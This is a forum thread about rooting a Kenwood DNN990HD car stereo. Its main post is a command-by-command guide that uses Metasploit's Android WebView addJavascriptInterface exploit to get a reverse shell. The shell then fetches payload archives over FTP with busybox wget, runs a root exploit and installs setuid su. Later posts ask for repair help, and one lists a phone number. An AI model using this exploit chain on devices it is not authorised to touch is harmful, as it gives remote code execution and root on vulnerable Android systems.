Kenwood DNN990HD - Android 4.0.4 car stereo - How to get started with rooting?

[Canadianbountyhunter]

A little late to the party

Hey everyone, I just got a truck with a DNN991hd. I’ve been trying to see if anyone made a better interface for it and although I read almost 2 dozen pages of this thread and several others I haven’t found anything yet. Maybe it’s out there and you know where I can look thanks a ton

 

[Jaremyhawk]

sorry for bringing up a very old thread..

hey chris i i seem to be having troubles with the exploit when using exploit it shows this

[-] Exploit failed: The following options failed to validate: LHOST.
[*] Exploit completed, but no session was created.
will be trying this exploit on a kenwood DNN 991HD since the 990 and 991hd use the same chip

First, I want to sincerely thank everyone who pledged money and donated!! Donations have been a big help in recouping my losses in purchasing new units after bricking them as well as motivation for finding exploit methods.

I initially looked at Metasploit and abandoned it after loosing shell sessions after exploiting to a root shell. Another method has now made this possible.
The great news about Metasploit is that it doesn't require any of my proprietary software to execute and the fruits of my labor from that exploit have all been rolled over to this method.
Thank you Metasploit developers!!

Lastly, just to clear up some confusion from the previous posts - I never intentionally left the forums. I have been working behind the scenes with our awesome mods to work out some problems and all is well.

This actual root process and implementation has been tested by a few users here already, just the implementation of the exploit is different. This shouldn't matter and I expect the same positive results. However, I want to give the usual disclaimer that this might brick your unit. If it does, I cannot be held responsible. Do it at your own risk!




Here is how to obtain root on the DNN990HD using Metasploit reverse TCP Webview exploit.
NOTE: It would be nice if someone could provide a dedicated FTP server with a dedicated IP to host the exploit

This assumes that you have installed Metasploit for Windows or Linux and have the Metasploit Console open.
Enter the following after getting a sessions with Metasploit.

##Anything with a "#" Is just a notation. Anything without it needs to be entered into the console.

#First load up the Metasploit Exploit
use exploit/android/browser/webview_addjavascriptinterface

#Set website path name
set URIPATH kroot

#Start the Exploit!
exploit

#On your deck visit the website in this format <IP Address> : <port number> / <URIPATH>.
#Below is only an EXAMPLE
192.168.1.10:8080/kroot

# Wait for the Metasploit console to return a session number.
# This might take a few tries, so if it seems like your browser just hangs, turn off your deck and visit the website again.

#Once session is spawned do the command session -i <session number> #
sessions -i 1

#setup environment variable for Android/linux
export PATH=/system/bin:/system/xbin:/ramdisk:$PATH

#change dir to /sdcard
cd /sdcard

#############################################################################
# From this point forward you will see several commands separated by the pipe symbol: |
# This make life easy. It also helps keep the time window down before Kenwood system lock kicks in
#Feel free to copy those chunks and paste them into Metasploit.
###############################################################################

#get exploit to the deck
#Note, the FTP or HTTP MUST be an ip address and not a host name.
#Alternatively you can download the files directly to the unit and copy them over to sdcard manually.
#Sample command for the browser download method would be as follows:
#busybox cp /sdcard/download/kroot.tar /sdcard/kroot.tar
busybox wget ftp://<ftp_IP_Address>/kroot_temp.tar | busybox wget ftp://<IP Address>/cds_kroot.tar

#Extract Root
busybox tar -x -f kroot_temp.tar -C /ramdisk

#chmod the root for exec
chmod 775 /ramdisk/device.db | chmod 775 /ramdisk/kroot

#Change dir to ramdisk
cd /ramdisk

#Execute out exploit in ramdisk
kroot

#Check to see if we are root
busybox whoami

#####################################################
## The result should return 0 - root. If not, something went wrong
#####################################################

#change dir back to sdcard
cd /sdcard

#mount root fs and /system
mount -o rw,remount /system | mount -o rw,remount /

# extract our perm root to where it needs to go
busybox tar -x -f cds_kwroot.tar -C /

#chmod /system/app and /data/app
chmod 644 /system/app/eu.chainfire.supersu-1.apk | chmod 644 /data/app/com.speedsoftware.sqleditor-1.apk


#chmod binaries
chmod 6755 /system/xbin/su | chmod 6755 /system/xbin/sqlite3 | chmod 6755 /system/xbin/setpropex | chmod 6755 /system.bin/cds_kroot
chmod 6755 /system/bin/setpropex

#Enable non market apps for the DNN
sqlite3 /data/data/com.android.providers.settings/databases/settings.db "UPDATE secure SET value=1 WHERE name='install_non_market_apps';"

#clear dalvik cache, and remove our source files. /Ramdisk will be taken care of by recovery.
rm /data/dalvik-cache/* | rm /sdcard/cds_kroot.tar | rm /sdcard/kroot_temp.tar

#reboot the unit
#unit will hard reboot five times then launch into recovery and rebuild dalvik.
reboot

############################################################
## THE UNIT WILL DISPLAY AN ERROR during the five reboots.
## Do **NOT** do anything and just let it reboot five times. (six if you count the first reboot)
## Once the last reboot is done, "System Rebuilding" will kick in.
#############################################################

#You now have root and non market apps

Please provide feedback and let me know how this works.

I will release these custom apps I developed very soon:
KWAudio.apk - This switches the Kenwood amp input to "Android" mode so that custom installed apps will route the audio correctly. (Instead of having to launch USB mode or other work around)
CDS_Kroot.apk - Will re-enable non market apps again after the Kenwood lock reverts it back. This app also has other misc things like forcing system rebuild, clearing dalvik cache and launching "Developer" hidden Android menu.

I will also soon release my Play Store process. And no, it's not as simple as installing the PlayStore APK.




If this works for you, consider donating to ChainFire for his awesome SuperSU app and or myself for researching and coming up with the implementation.

Edited 6/19/2014 11:04 PM to fix typos and make it easier to read.

 

[Jaremyhawk]

after further screwing around with the meraexploit you frogot to add the commands set Lhost (your pc ip)

set Lhost 4444
now the exploit runs
for some reason the prevous owner of this deck updated it to 1.8....... has anyone cracked this fw update? or is there a way to downgrade this unit back to 1.5 or 1.3

 

[Leandro Mantecón]

Can anybody help me. I have a dnn9710bt. And during a repair on my vehicle, the mechanic did not turn off the panel when removing the battery from the car. After that, the control panel went into a loop when restarting, an ERROR message STARTING KW LAUCHER appears ... Even pressing the factory initialization (red button) ... Here in Brazil I did not find the solution. Thank you so much for your help!
My personal email [email protected]
whatsapp 55 34 99971 5038

 

[juanchi1981]

Hi, I just have to create those files ???

These are the steps Kenwood sent me for wiping my dnn992
Only extract the (2) folders labeled ".Delete_Data.zip" and ".Longface_15DNN.zip". When you extract each of these folders, files named ".DELETE_DATA" and ".LONGFACE_15DNN" will be available. Be sure to format the USB to FAT32 prior to placing the files onto it. Keep in mind that a format will delete all information currently on the USB.



Copy the 2 files (.DELETE_DATA" and ".LONGFACE_15DNN) into a USB flash drive along with the zip folder labeled "update.zip".



Do not extract the "update.zip" folder. The USB flash drive should now contain 2 files (.DELETE_DATA" and ".LONGFACE_14DNN) and one zipped folder (update.zip) only.



Connect the USB flash drive to the unit and it should start automatically.

The update should take a few minutes. Be sure to connect the USB flash drive to the USB port, not the iPod or WiFi port.

hello, would you help me by sending the files to my mail [email protected], thanks

 

[Birra75]

I have DNN990HD which have corrupted ROM. Does anyone have guidelines how to flash fwdn and where to get unmodified ROM for it? Thanks.

 

[reggieguy1]

please i have the same problem with my unit and i spent a whole lot is buying it, please i really need your help i cant just afford to loose it just like that , mine is the DNN990HD, please do get back to me ASAP my email is [email protected]

 

[denzfarid]

hai folks long time no see this thread,
Question:
How to update su binary?
problem si supuer user su binary has been outdated and always failed of im update, only in apps superuser but working with terminal
thank you